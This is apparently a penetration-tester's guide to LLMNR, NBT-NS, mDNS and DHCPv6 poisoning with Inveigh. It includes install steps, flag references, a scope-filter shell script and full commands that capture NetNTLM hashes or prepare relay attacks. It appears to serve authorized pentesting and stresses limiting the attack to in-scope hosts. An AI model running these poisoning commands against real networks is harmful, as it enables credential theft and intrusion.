Coercion and Relay

Force authentication to your own machine and relay the connection to a host that doesn't enforce message signing (for SMB, a target where signing is not required). Confirm which targets fall into that bucket before relaying, e.g. with NetExec/CrackMapEsec's --gen-relay-list output, so the relay isn't wasted on hosts that will reject it.

Inveigh

My preferred tool for coercion and relay attacks is Inveigh. Inveigh is similar to MITM6 and Responder but has more customization. Also, since it's Dotnet, it can be run on both Windows and Linux fairly easily.

Installation (Kali Linux)

git clone https://github.com/Kevin-Robertson/Inveigh
cd Inveigh

# Install the Dotnet 8 SDK from Microsoft's Debian package feed
wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
rm packages-microsoft-prod.deb
sudo apt-get update
sudo apt-get install -y dotnet-sdk-8.0

# Compile Inveigh
dotnet publish -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
cd ./Inveigh/bin/Release/net8.0/linux-x64/
echo "export PATH=$PATH:$(pwd)" >> ~/.zshrc
export PATH=$PATH:$(pwd)
cd ../../../../../

The Dotnet version of Inveigh seems to be updated about once a year. If the above stops working, replace all mentions of Dotnet 8 (the apt package, the -f net8.0 target, and the net8.0 output path) with Dotnet 9 and see if that works.

Custom Flags and Variables

Inveigh has A LOT of flags; below are some of the more useful ones along with examples of how to use them. The Inveigh flags generally work by toggling things on and off, e.g. -SMB Y to turn on the SMB server and -SMB N to turn it off.

Help

Inveigh's help is slightly different since the project was originally built for just Windows before it was ported over to Dotnet. You can use the help to see the default value of every flag.

inveigh -?

Note that, for some reason, you must use the EXACT command above to get help; any other flag on the line breaks it. For example, inveigh -SMB Y -? will not print help because there is a flag between inveigh and -?.

Responder Replacement

The LLMNR, NBNS, and MDNS flags toggle the poisoners for those services on and off. Turning all three on does what Responder.py does.

  • LLMNR Poisoner: On=-LLMNR Y / Off=-LLMNR N

  • NBT-NS Poisoner: On=-NBNS Y / Off=-NBNS N

  • mDNS Poisoner: On=-MDNS Y / Off=-MDNS N

MITM6 Replacement

The DHCPv6 flag and the ICMPv6 flag control the DHCPv6 attacks. Turning them on makes Inveigh perform MITM6-like attacks.

  • DHCPv6 Poisoner: On=-DHCPv6 Y / Off=-DHCPv6 N

  • Send IPv6 Router Advertisements: On=-ICMPv6 Y / Off=-ICMPv6 N

Controlling Logging and Output

There is a lot of customization in how much it outputs, but in my experience it's always best to have it log to a file and run the console output at level 1.

  • Save logs in File (tee): On=-FileOutput Y -LogOutput Y / Off=-FileOutput N -LogOutput N

  • Set Console Output level: -Console <1-5> (-Console 1 is recommended)

Malicious Services

Just like Responder and MITM6, Inveigh has a few malicious services: SMB, HTTP, LDAP, DNS, Proxy, and WPAD servers. Note that it does not have nearly as many services as Responder.

  • Malicious SMB Service: On=-SMB Y / Off=-SMB N

  • Malicious HTTP Service: On=-HTTP Y / Off=-HTTP N

  • Malicious LDAP Service: On=-LDAP Y / Off=-LDAP N

  • Malicious DNS Service: On=-DNS Y / Off=-DNS N

  • Malicious WPAD Service: On=-WPAD Y / Off=-WPAD N

  • Malicious Proxy Service (I’m not sure what this is…): On=-Proxy Y / Off=-Proxy N

Limit Attack

The HUGE advantage of Inveigh over Responder and MITM6 is its ability to limit the attack. Both Responder and MITM6 can do some degree of filtering, but it's much less flexible than Inveigh. There are two main cases where this is helpful to me.

  1. When the whole local network is not in scope (i.e. the client cherry-picked IPs). In these cases, I limit ReplyToIPs (for local network poisoning) or ReplyToMACs (for IPv6 attacks) to the active hosts list.

  2. When poison-able requests are infrequent and I need to leave the poisoner running overnight. In these cases I limit the attack to a certain time period or tell it to stop after it has captured a hash.

Also, I always set a ReplyToDomains filter for the DNS poisoner, since we are going for creds and not trying to block the end users from reaching Bing… although that would be a kind thing to do.

  • Limit DNS Poisoning to Domain(s): Single=-ReplyToDomains example.com / Multi=-ReplyToDomains example.com,sub.example.com

  • Limit attack to IP(s): Single=-ReplyToIPs 10.0.0.2 / Multi=-ReplyToIPs 10.0.0.2,10.0.0.3

  • Limit attack to Mac(s): Single=-ReplyToMACs ff:ff:ff:ff:ff:ff / Multi=-ReplyToMACs ff:ff:ff:ff:ff:ff,aa:aa:aa:aa:aa:aa


Input Files as Mac/IP Filters

There is no native support for input files containing lists of IPs or MACs to filter on. Therefore, I came up with the below to help this process. Note that the input file MUST be a list of single IPs only, NO CIDRs OR RANGES, since the flags only accept individual addresses.

Define file path variable (Prompt)

command -v vared >/dev/null && vared -p 'Target active IPs (NO CIDRs) list file path: ' -c TARGETS || read -p "Target active IPs (NO CIDRs) list file path: " TARGETS

Limited to in-scope IPs (Flag only): Only use for local network poisoning (LLMNR, NBT-NS, mDNS)

-ReplyToIPs $(paste -sd, "$TARGETS")

Limit to in-scope MACs (Flag only): Only needed for IPv6 DHCP attacks

-ReplyToMACs $(for IP in $(cat "$TARGETS"); do arp "$IP" | grep -Ev 'HWaddress| -- no entry|\(incomplete\)' | awk '{print $3}'; done | paste -sd,)
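The one-liners above work, but they trust the targets file completely: a stray CIDR or range is passed straight to Inveigh, and a file without a trailing newline loses the last character of its last IP to the sed. The script below is an added example (not Inveigh's own code, nor the author's) that builds the same two flag values with those checks in place and reads MACs from the kernel neighbour table via ip neigh instead of the deprecated arp. It assumes the neighbour table has already been populated (e.g. by an nmap -sn sweep of the in-scope hosts); the sample targets file and neighbour table at the bottom are constructed, not captured.

```shell
#!/bin/sh
# Added example (not from the Inveigh project): build Inveigh's -ReplyToIPs and
# -ReplyToMACs values from a targets file. Rejects CIDRs and ranges (the flags
# take single addresses only) and resolves MACs from `ip neigh` output.

# Succeed only for a dotted-quad IPv4 address with every octet in 0-255.
is_plain_ipv4() {
  printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
  oldifs=$IFS; IFS=.
  set -- $1          # split the address into its four octets
  IFS=$oldifs
  for oct in "$@"; do
    [ "$oct" -le 255 ] || return 1
  done
}

# Print the file's addresses as one comma-separated line. Blank lines and
# '#' comments are skipped; any CIDR or range aborts with exit 1 so a sloppy
# file cannot silently widen the poisoner's scope. A missing trailing newline
# is handled (the tr|sed one-liner would eat the last octet in that case).
targets_to_csv() {
  csv=
  while IFS= read -r line || [ -n "$line" ]; do
    line=${line%%#*}
    line=$(printf '%s' "$line" | tr -d '[:space:]')
    [ -z "$line" ] && continue
    if ! is_plain_ipv4 "$line"; then
      printf 'refusing "%s": single IPv4 addresses only, no CIDRs or ranges\n' "$line" >&2
      return 1
    fi
    csv=${csv:+$csv,}$line
  done < "$1"
  printf '%s\n' "$csv"
}

# Read `ip neigh` output on stdin and print the MACs of the IPs given as
# arguments, comma-separated. Entries with no lladdr (FAILED/INCOMPLETE) are
# dropped; that is the case arp(8) shows as "(incomplete)". STALE entries are
# kept: the host was seen, which is good enough for ReplyToMACs.
neigh_to_macs() {
  awk -v want="$*" '
    BEGIN { n = split(want, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    ($1 in ok) {
      for (i = 2; i < NF; i++)
        if ($i == "lladdr") { macs = macs (macs ? "," : "") $(i + 1); break }
    }
    END { if (macs) print macs }'
}

# Live use on the attack box: both flag values from the $TARGETS file.
# (ip neigh is only called here; the demo below uses constructed data.)
reply_to_flags() {
  ips=$(targets_to_csv "$1") || return 1
  macs=$(ip neigh show | neigh_to_macs $(printf '%s' "$ips" | tr ',' ' '))
  printf -- '-ReplyToIPs %s -ReplyToMACs %s\n' "$ips" "$macs"
}

# Constructed sample data: a targets file with a comment, a blank line and no
# trailing newline, plus a neighbour table where one host never answered ARP.
SAMPLE_TARGETS=$(mktemp)
printf '10.0.0.2\n10.0.0.3  # workstation\n\n10.0.0.4' > "$SAMPLE_TARGETS"
SAMPLE_NEIGH='10.0.0.2 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
10.0.0.3 dev eth0 lladdr aa:bb:cc:dd:ee:02 STALE
10.0.0.4 dev eth0 FAILED
10.0.0.50 dev eth0 lladdr aa:bb:cc:dd:ee:50 REACHABLE'

ips=$(targets_to_csv "$SAMPLE_TARGETS")
echo "-ReplyToIPs $ips"
echo "-ReplyToMACs $(printf '%s\n' "$SAMPLE_NEIGH" | neigh_to_macs $(printf '%s' "$ips" | tr ',' ' '))"
printf '10.0.0.0/24\n' > "$SAMPLE_TARGETS"
targets_to_csv "$SAMPLE_TARGETS" || echo "CIDR refused, as intended"
rm -f "$SAMPLE_TARGETS"
```

Note that 10.0.0.50 is in the neighbour table but not in the targets file, so it never reaches the MAC list: the filter is driven by the scope file, not by whatever happens to be on the wire. Drop reply_to_flags "$TARGETS" into the long commands later on this page in place of the two $(…) expansions.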

Auto Shutdown

You can configure inveigh to automatically shutdown when certain criteria are hit like a time limit or a certain number of capture hashes.

  • Limit Runtime (In Minutes): -RunTime <MM> (Ex: -RunTime 15 to run the attack for 15 minutes)

  • Limit Hash Capture: -RunCount <#> (Ex: -RunCount 1 to run until 1 NetNTLM hash is captured)

Example Inveigh Commands

Below is my suggestion on full Inveigh commands to use during a pentest. Make sure to set the domain name and targets file path before running any of the below. The "Relay" variants turn Inveigh's own SMB and HTTP listeners off so that ports 445 and 80 stay free for whichever relay tool you run alongside it; the "Capture Hashes" variants turn them on so Inveigh captures the NetNTLM hashes itself.

Define variable (Prompt)

command -v vared >/dev/null && vared -p 'Domain of Active Directory account: ' -c ADDOMAIN || read -p "Domain of Active Directory account: " ADDOMAIN
command -v vared >/dev/null && vared -p 'Target active IPs (NO CIDRs!) list file path: ' -c TARGETS || read -p 'Target active IPs (NO CIDRs!) list file path: ' TARGETS

Note that I use sudo env "PATH=$PATH" inveigh to run inveigh as root while passing in the local user path where inveigh is installed.

Passive-ish Attack

Fully Passive Listener

inveigh -Inspect Y -DHCPv6 Y -MDNS Y -NBNS Y -HTTPS Y -FileOutput Y -LogOutput Y

Only capture hashes

inveigh -LLMNR N -NBNS N -MDNS N -ICMPV6 N -DNS N

IPv6 Attack

Capture Hashes (Start SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS N -LLMNR N -MDNS N -SMB Y -DHCPV6 Y -HTTP Y -ICMPv6 N -Console 1 -DNS Y -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToMACs $(for IP in $(cat $TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Flip the -ICMPv6 N to -ICMPv6 Y if you want to send out IPv6 router advertisements


Relay (No SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS N -LLMNR N -MDNS N -SMB N -DHCPV6 Y -HTTP N -ICMPv6 N -Console 1 -DNS Y -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToMACs $(for IP in $(cat $TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Local Network Poisoning

Capture Hashes (Start SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB Y -DHCPV6 N -HTTP Y -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $TARGETS | sed 's/.$//')

Relay (No SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB N -DHCPV6 N -HTTP N -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $TARGETS | sed 's/.$//')

All-in-one (IPv6 & LNP Attack)

Capture Hashes (Start SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB Y -DHCPV6 Y -HTTP Y -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $TARGETS | sed 's/.$//') -ReplyToMACs $(for IP in $(cat $TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Relay (No SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB N -DHCPV6 Y -HTTP N -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $TARGETS | sed 's/.$//') -ReplyToMACs $(for IP in $(cat $TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Flip the -ICMPv6 N to -ICMPv6 Y if you want to send out IPv6 router advertisements
